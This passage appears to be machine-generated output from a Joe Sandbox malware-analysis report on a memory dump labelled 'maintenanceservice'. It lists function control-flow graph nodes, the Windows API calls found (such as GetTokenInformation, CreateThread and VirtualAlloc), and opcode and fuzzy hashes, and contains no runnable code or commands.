                                                                                                                                                                                                                                                                                                                                                                                          Function 022581C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 22581c0-22581d8 1 22581e5 0->1 2 22583bf-22583ca 0->2 3 22582a3-22582a5 1->3 4 22581eb 1->4 16 2258277-225827a 2->16 17 22583d0 2->17 5 22583f9 3->5 6 22582ab 3->6 8 22581f1 4->8 9 22582b2-22582bc 4->9 11 22582d2-22582d7 5->11 12 22583ff 5->12 6->5 13 22582b1 6->13 8->9 10 22581f7-225828e 8->10 14 22582c5-22582c8 9->14 15 2258357-225836f GetTokenInformation 9->15 20 2258306-2258309 11->20 21 225f524-225f52e 12->21 13->9 14->5 22 22582ce 14->22 30 2258376-225837b 15->30 23 2258241 16->23 24 225827c 16->24 17->16 18 22583d6 17->18 25 225832e-2258330 20->25 26 225830b-2258311 CloseHandle 20->26 27 225f807 21->27 28 22582d0 22->28 29 225828f-2258303 call 22872ec 22->29 23->30 32 2258251-2258256 call 22872f4 23->32 24->23 31 225827e 24->31 40 2258332 25->40 41 22582dd-22582e3 25->41 26->25 34 225f80d 27->34 35 225f8df-225f8e0 27->35 28->11 28->29 29->20 60 225834f-2258355 29->60 36 2258381 30->36 37 22582f0-225831c 30->37 31->26 38 2258284 31->38 49 225825b-2258260 32->49 34->35 44 225f813 34->44 52 22615a5-22615aa 35->52 36->37 47 2258387 36->47 37->1 61 2258322 37->61 38->25 40->41 42 2258334 40->42 45 22583a3-22583a4 41->45 46 22582e9 41->46 42->21 56 225f78f 44->56 57 225f81b 44->57 45->21 46->45 54 22582ef 46->54 47->16 50 2258390-2258393 47->50 49->50 50->31 58 2258399 50->58 59 22615ae-22615af 52->59 54->37 56->57 62 225f795 56->62 57->35 58->31 63 225839f-22583a1 58->63 65 22615b2-22615b7 59->65 66 2258341 60->66 67 2258212-225821a GetTokenInformation 60->67 61->1 69 2258328-225832c 61->69 62->27 63->45 68 22615ba-22615c1 65->68 66->67 70 2258347 66->70 71 2258220-2258234 67->71 72 22583af 67->72 73 22615c7-22615d2 68->73 74 2261750-22617a2 call 22872f4 68->74 69->14 69->25 75 225834d 70->75 76 2261638-2261640 70->76 103 22583d7-22583dd 71->103 104 225823a 71->104 72->32 78 22583b5 72->78 80 22615d4-22615d6 73->80 81 2261620-2261623 73->81 75->60 84 2261646-226165f 76->84 85 226170e-2261727 76->85 78->32 86 22583bb-22583bd 78->86 88 2261670-2261684 80->88 89 22615dc-22615df 80->89 82 2261625-2261628 81->82 83 22616a0-22616b4 81->83 82->68 90 226162a-2261636 82->90 95 22616b6-22616b9 83->95 96 22616f4-22616f5 83->96 84->73 92 2261665 84->92 85->73 91 226172d 85->91 86->2 88->52 93 226168a-226168d 88->93 89->68 97 22615e1-22615f6 89->97 90->76 100 22616dc-22616ec 90->100 91->74 92->74 101 2261693-2261697 93->101 102 226172f-2261738 93->102 105 226173a-226173b 95->105 106 22616bb 95->106 108 22616fe-226170c 96->108 98 22616d2-22616d7 97->98 99 22615fc-2261600 97->99 98->59 107 2261606-2261618 99->107 99->108 100->73 109 22616f2 100->109 111 22616bf-22616cd 101->111 110 226173f-2261740 102->110 103->5 104->103 112 2258240 104->112 105->110 106->111 107->65 114 2261744-2261748 108->114 109->74 110->114 115 226b32e-226b330 112->115 116 226b332-226b337 call 22872f4 115->116 117 226b300 115->117 116->117 123 226b339 116->123 121 226b302 117->121 122 226b2fd 117->122 124 226b305 122->124 125 226b2ff 122->125 123->117 128 226b33b-226b33f 123->128 126 226b322-226b32d 124->126 127 226b308-226b315 124->127 125->127 126->115 127->124 130 226b317 127->130 128->127 130->122
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68899332afa650e25d41fe11fdf9e65f82f9e585c3e4251c603d1b2003eca3a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b69cad99d21e6cbb3459d2b2d30165f2ce8950f566ad22f938a820a0c56cf772
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68899332afa650e25d41fe11fdf9e65f82f9e585c3e4251c603d1b2003eca3a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B1493153CA968BC7298BD98484275BB91FF85318F18C259DC8BCB26DDBF49892C353
                                                                                                                                                                                                                                                                                                                                                                                          Function 02255B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 131 2255b8f-2255c20 call 22653f0 call 2288358 call 2270320 call 22581c0 141 2255cf4-2255d08 call 22872ec 131->141 142 2255c26 131->142 146 2255c87-2255dc8 call 2255e60 call 2255990 141->146 147 2255d0e 141->147 142->141 143 2255c2c-2255c2f 142->143 162 2255dcd 146->162 147->146 148 2255d14-2255d18 147->148 153 2255c65 148->153 154 2255daf-2255db6 call 22552d0 148->154 155 2255c67 153->155 156 2255ca3 call 2255df0 153->156 165 2255c30-2255c39 154->165 166 2255dbc 154->166 155->156 159 2255c69-2255c72 155->159 171 2255c45-2255d6d call 2271520 156->171 163 2255c97-2255c9d 159->163 164 2255c78 159->164 162->162 181 2255c85 163->181 182 2255c9f 163->182 172 2255d1f-2255d45 164->172 173 2255c7e 164->173 187 2255bf7 165->187 188 2255cb9-2255cbd 165->188 168 2255d7d-2255d89 166->168 169 2255dbe 166->169 183 2255d94 168->183 184 2255d8b-2255d92 168->184 169->168 186 2255d9b 169->186 189 2255bfd-2255c06 171->189 200 2255d73 171->200 193 2255cd4-2255cea CreateThread CloseHandle 172->193 194 2255d47 172->194 173->172 174 2255c84 173->174 190 2255ca9-2255cad 174->190 181->146 182->181 195 2255ca1 182->195 183->190 184->183 196 2255d9c 184->196 186->196 187->188 187->189 191 2255d56-2255d5b CreateThread 188->191 192 2255cc3 188->192 204 2255da5-2255da8 189->204 190->143 198 2255cb3 190->198 191->164 192->191 199 2255cc9 192->199 193->184 201 2255cf0-2255d4d 193->201 194->193 195->156 196->204 198->143 198->188 199->191 200->189 205 2255d79-2255d7b 200->205 201->183 204->154 205->168
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: faefc440a9211e883ac53558ebc5393f135b1984b497e1e3efdf3eea10b4608d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1ce0cbe75a1f611dd7c7adcad305539cb868bd85103931a08780d2ba648eba41
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faefc440a9211e883ac53558ebc5393f135b1984b497e1e3efdf3eea10b4608d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99411C31239A7A8FDB6897F8845C33976E1EB45325FC4C1A6EC06CB1ADDBB58420C742
                                                                                                                                                                                                                                                                                                                                                                                          Function 02255D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 207 2255d22-2255d45 208 2255cd4-2255cea CreateThread CloseHandle 207->208 209 2255d47 207->209 210 2255cf0-2255d4d 208->210 211 2255d8b-2255d92 208->211 209->208 214 2255d94 210->214 211->214 215 2255d9c 211->215 216 2255ca9-2255cad 214->216 217 2255da5-2255db6 call 22552d0 215->217 218 2255cb3 216->218 219 2255c2c-2255c2f 216->219 231 2255c30-2255c39 217->231 232 2255dbc 217->232 218->219 220 2255cb9-2255cbd 218->220 222 2255d56-2255d5b CreateThread 220->222 223 2255cc3 220->223 228 2255d1f-2255d45 222->228 229 2255c7e 222->229 223->222 225 2255cc9 223->225 225->222 228->208 228->209 229->228 230 2255c84 229->230 230->216 231->220 241 2255bf7 231->241 234 2255d7d-2255d89 232->234 235 2255dbe 232->235 234->211 234->214 235->234 240 2255d9b 235->240 240->215 241->220 242 2255bfd-2255c06 241->242 242->217
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83a4bf01300eedd0214b9b4b5f6bfa8d7fe2fb78569bea2f30ab15a28b6f76fb
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0F62263D96785DB2C82F8885933A61C1A789236FD4C75EFC57C90ECDBB58131C205
                                                                                                                                                                                                                                                                                                                                                                                          Function 02255D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 244 2255d50-2255d5b CreateThread 245 2255c78 244->245 246 2255d1f-2255d45 245->246 247 2255c7e 245->247 251 2255cd4-2255cea CreateThread CloseHandle 246->251 252 2255d47 246->252 247->246 248 2255c84 247->248 250 2255ca9-2255cad 248->250 253 2255cb3 250->253 254 2255c2c-2255c2f 250->254 255 2255cf0-2255d4d 251->255 256 2255d8b-2255d92 251->256 252->251 253->254 258 2255cb9-2255cbd 253->258 260 2255d94 255->260 256->260 261 2255d9c 256->261 262 2255d56-2255d5b CreateThread 258->262 263 2255cc3 258->263 260->250 264 2255da5-2255db6 call 22552d0 261->264 262->245 263->262 265 2255cc9 263->265 269 2255c30-2255c39 264->269 270 2255dbc 264->270 265->262 269->258 278 2255bf7 269->278 271 2255d7d-2255d89 270->271 272 2255dbe 270->272 271->256 271->260 272->271 277 2255d9b 272->277 277->261 278->258 279 2255bfd-2255c06 278->279 279->264
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47d31120db517c4ebad1fa4244cda7866d40a170fc4b8afb638e67c6add7f1f9
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58B0120203AAAB45001553B0040822885802F4E03CBF89FBDFF73068EEDB6114249320
                                                                                                                                                                                                                                                                                                                                                                                          Function 02255990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 281 2255990-225599b 283 22559a1 281->283 284 2255a33-2255a61 call 2289b00 281->284 283->284 286 22559a7-22559ab 283->286 295 2255ab4-2255aba call 2271080 284->295 296 2255a63 284->296 289 22559b1-22559f3 call 2282320 286->289 290 2255a59 286->290 289->290 311 22559f5-22559fa 289->311 292 2255a25-2255a2d 290->292 293 2255a5b 290->293 300 2255a70-2255a7b 292->300 301 2255a2f 292->301 293->292 303 2255a23 293->303 314 2255a83-2255a88 call 2255df0 295->314 317 2255a13 295->317 296->295 298 2255a65 296->298 298->300 304 2255a16-2255a1e call 2271470 300->304 305 2255a7d 300->305 301->298 309 2255a24 303->309 318 2255a96-2255ac2 304->318 305->304 310 2255a7f-2255a81 305->310 310->314 315 2255a51-2255a54 call 228233c 311->315 316 22559fc 311->316 323 2255a8d VirtualAlloc 314->323 315->290 316->315 320 22559fe-2255a02 316->320 317->314 322 2255a15 317->322 318->309 325 2255ac8 318->325 320->315 322->304 323->318 325->309 326 2255ace 325->326 326->284
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 88ec71e40fa197054b4ddaa2347ac7898f40e37a13d83128b2bf038de933d4cc
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB21C83153DBB54BC76A93E8449037526A2BB85328FC88187FC86C719DDB7C893CC642
                                                                                                                                                                                                                                                                                                                                                                                          Function 02258245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 328 2258245-2258247 329 22582d2-22582d7 328->329 330 225824d-225824f 328->330 331 2258306-2258309 329->331 332 2258251-2258260 call 22872f4 330->332 333 225832e-2258330 331->333 334 225830b-2258311 CloseHandle 331->334 340 2258390-2258393 332->340 336 2258332 333->336 337 22582dd-22582e3 333->337 334->333 336->337 339 2258334 336->339 341 22583a3-22583a4 337->341 342 22582e9 337->342 343 225f524-225f52e 339->343 344 225827e 340->344 345 2258399 340->345 341->343 342->341 346 22582ef 342->346 347 225f807 343->347 344->334 349 2258284 344->349 345->344 348 225839f-22583a1 345->348 352 22582f0-225831c 346->352 350 225f80d 347->350 351 225f8df-225f8e0 347->351 348->341 349->333 350->351 353 225f813 350->353 355 22615a5-22615aa 351->355 361 22581e5 352->361 362 2258322 352->362 358 225f78f 353->358 359 225f81b 353->359 360 22615ae-22615af 355->360 358->359 363 225f795 358->363 359->351 364 22615b2-22615b7 360->364 367 22582a3-22582a5 361->367 368 22581eb 361->368 362->361 366 2258328-225832c 362->366 363->347 365 22615ba-22615c1 364->365 371 22615c7-22615d2 365->371 372 2261750-22617a2 call 22872f4 365->372 366->333 373 22582c5-22582c8 366->373 369 22583f9 367->369 370 22582ab 367->370 374 22581f1 368->374 375 22582b2-22582bc 368->375 369->329 377 22583ff 369->377 370->369 379 22582b1 370->379 382 22615d4-22615d6 371->382 383 2261620-2261623 371->383 373->369 378 22582ce 373->378 374->375 376 22581f7-225828e 374->376 375->373 380 2258357-225836f GetTokenInformation 375->380 377->343 387 22582d0 378->387 388 225828f-2258303 call 22872ec 378->388 379->375 394 2258376-225837b 380->394 390 2261670-2261684 382->390 391 22615dc-22615df 382->391 385 2261625-2261628 383->385 386 22616a0-22616b4 383->386 385->365 393 226162a-2261636 385->393 396 22616b6-22616b9 386->396 397 22616f4-22616f5 386->397 387->329 387->388 388->331 422 225834f-2258355 388->422 390->355 395 226168a-226168d 390->395 391->365 398 22615e1-22615f6 391->398 402 22616dc-22616ec 393->402 403 2261638-2261640 393->403 394->352 404 2258381 394->404 405 2261693-2261697 395->405 406 226172f-2261738 395->406 407 226173a-226173b 396->407 408 22616bb 396->408 410 22616fe-226170c 397->410 399 22616d2-22616d7 398->399 400 22615fc-2261600 398->400 399->360 409 2261606-2261618 400->409 400->410 402->371 411 22616f2 402->411 413 2261646-226165f 403->413 414 226170e-2261727 403->414 404->352 416 2258387 404->416 417 22616bf-22616cd 405->417 415 226173f-2261740 406->415 407->415 408->417 409->364 418 2261744-2261748 410->418 411->372 413->371 420 2261665 413->420 414->371 419 226172d 414->419 415->418 416->340 421 2258277-225827a 416->421 419->372 420->372 424 2258241 421->424 425 225827c 421->425 426 2258341 422->426 427 2258212-225821a GetTokenInformation 422->427 424->332 424->394 425->344 425->424 426->427 428 2258347 426->428 429 2258220-2258234 427->429 430 22583af 427->430 428->403 431 225834d 428->431 437 22583d7-22583dd 429->437 438 225823a 429->438 430->332 433 22583b5 430->433 431->422 433->332 434 22583bb-22583ca 433->434 434->421 443 22583d0 434->443 437->369 438->437 439 2258240 438->439 442 226b32e-226b330 439->442 445 226b332-226b337 call 22872f4 442->445 446 226b300 442->446 443->421 444 22583d6 443->444 445->446 452 226b339 445->452 450 226b302 446->450 451 226b2fd 446->451 453 226b305 451->453 454 226b2ff 451->454 452->446 457 226b33b-226b33f 452->457 455 226b322-226b32d 453->455 456 226b308-226b315 453->456 454->456 455->442 456->453 459 226b317 456->459 457->456 459->451
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7f279f2fee6088f9cc4045afa2729bf2fd11706bbbbd160ac4c40def327419c5
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0862453EAF39BC62A87D490545356FA0AF82214B99C08ADC86CB95ED7F8DC82C753
                                                                                                                                                                                                                                                                                                                                                                                          Function 02258318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 460 2258318-225831c 461 22581e5 460->461 462 2258322 460->462 464 22582a3-22582a5 461->464 465 22581eb 461->465 462->461 463 2258328-225832c 462->463 468 22582c5-22582c8 463->468 469 225832e-2258330 463->469 466 22583f9 464->466 467 22582ab 464->467 470 22581f1 465->470 471 22582b2-22582bc 465->471 473 22582d2-22582d7 466->473 474 22583ff 466->474 467->466 476 22582b1 467->476 468->466 475 22582ce 468->475 478 2258332 469->478 479 22582dd-22582e3 469->479 470->471 472 22581f7-225828e 470->472 471->468 477 2258357-225836f GetTokenInformation 471->477 482 2258306-2258309 473->482 483 225f524-225f52e 474->483 484 22582d0 475->484 485 225828f-2258303 call 22872ec 475->485 476->471 491 2258376-225837b 477->491 478->479 480 2258334 478->480 486 22583a3-22583a4 479->486 487 22582e9 479->487 480->483 482->469 488 225830b-2258311 CloseHandle 482->488 489 225f807 483->489 484->473 484->485 485->482 506 225834f-2258355 485->506 486->483 487->486 492 22582ef 487->492 488->469 494 225f80d 489->494 495 225f8df-225f8e0 489->495 496 2258381 491->496 497 22582f0-225831c 491->497 492->497 494->495 499 225f813 494->499 502 22615a5-22615aa 495->502 496->497 500 2258387 496->500 497->461 497->462 508 225f78f 499->508 509 225f81b 499->509 504 2258277-225827a 500->504 505 2258390-2258393 500->505 513 22615ae-22615af 502->513 514 2258241 504->514 515 225827c 504->515 510 225827e 505->510 511 2258399 505->511 516 2258341 506->516 517 2258212-225821a GetTokenInformation 506->517 508->509 518 225f795 508->518 509->495 510->488 521 2258284 510->521 511->510 519 225839f-22583a1 511->519 520 22615b2-22615b7 513->520 514->491 522 2258251-2258260 call 22872f4 514->522 515->510 515->514 516->517 523 2258347 516->523 524 2258220-2258234 517->524 525 22583af 517->525 518->489 519->486 526 22615ba-22615c1 520->526 521->469 522->505 528 225834d 523->528 529 2261638-2261640 523->529 552 22583d7-22583dd 524->552 553 225823a 524->553 525->522 531 22583b5 525->531 532 22615c7-22615d2 526->532 533 2261750-22617a2 call 22872f4 526->533 528->506 535 2261646-226165f 529->535 536 226170e-2261727 529->536 531->522 537 22583bb-22583ca 531->537 539 22615d4-22615d6 532->539 540 2261620-2261623 532->540 535->532 544 2261665 535->544 536->532 543 226172d 536->543 537->504 573 22583d0 537->573 548 2261670-2261684 539->548 549 22615dc-22615df 539->549 541 2261625-2261628 540->541 542 22616a0-22616b4 540->542 541->526 550 226162a-2261636 541->550 554 22616b6-22616b9 542->554 555 22616f4-22616f5 542->555 543->533 544->533 548->502 551 226168a-226168d 548->551 549->526 556 22615e1-22615f6 549->556 550->529 559 22616dc-22616ec 550->559 560 2261693-2261697 551->560 561 226172f-2261738 551->561 552->466 553->552 562 2258240 553->562 563 226173a-226173b 554->563 564 22616bb 554->564 567 22616fe-226170c 555->567 557 22616d2-22616d7 556->557 558 22615fc-2261600 556->558 557->513 566 2261606-2261618 558->566 558->567 559->532 568 22616f2 559->568 571 22616bf-22616cd 560->571 570 226173f-2261740 561->570 572 226b32e-226b330 562->572 563->570 564->571 566->520 577 2261744-2261748 567->577 568->533 570->577 575 226b332-226b337 call 22872f4 572->575 576 226b300 572->576 573->504 574 22583d6 573->574 575->576 583 226b339 575->583 581 226b302 576->581 582 226b2fd 576->582 584 226b305 582->584 585 226b2ff 582->585 583->576 588 226b33b-226b33f 583->588 586 226b322-226b32d 584->586 587 226b308-226b315 584->587 585->587 586->572 587->584 590 226b317 587->590 588->587 590->582
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0225830B
                                                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 02258369
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1751292247.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Offset: 02250000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_2250000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 08f1bf94d75151fe88a691c97637ce5ac8602b8b7ef88d974d407a6f0a022228
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F0622543D6B39B8A2546D485446352B506E42154BACC449CC46CB92ED7F8D8C1C753
                                                                                                                                                                                                                                                                                                                                                                                          Function 022583E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
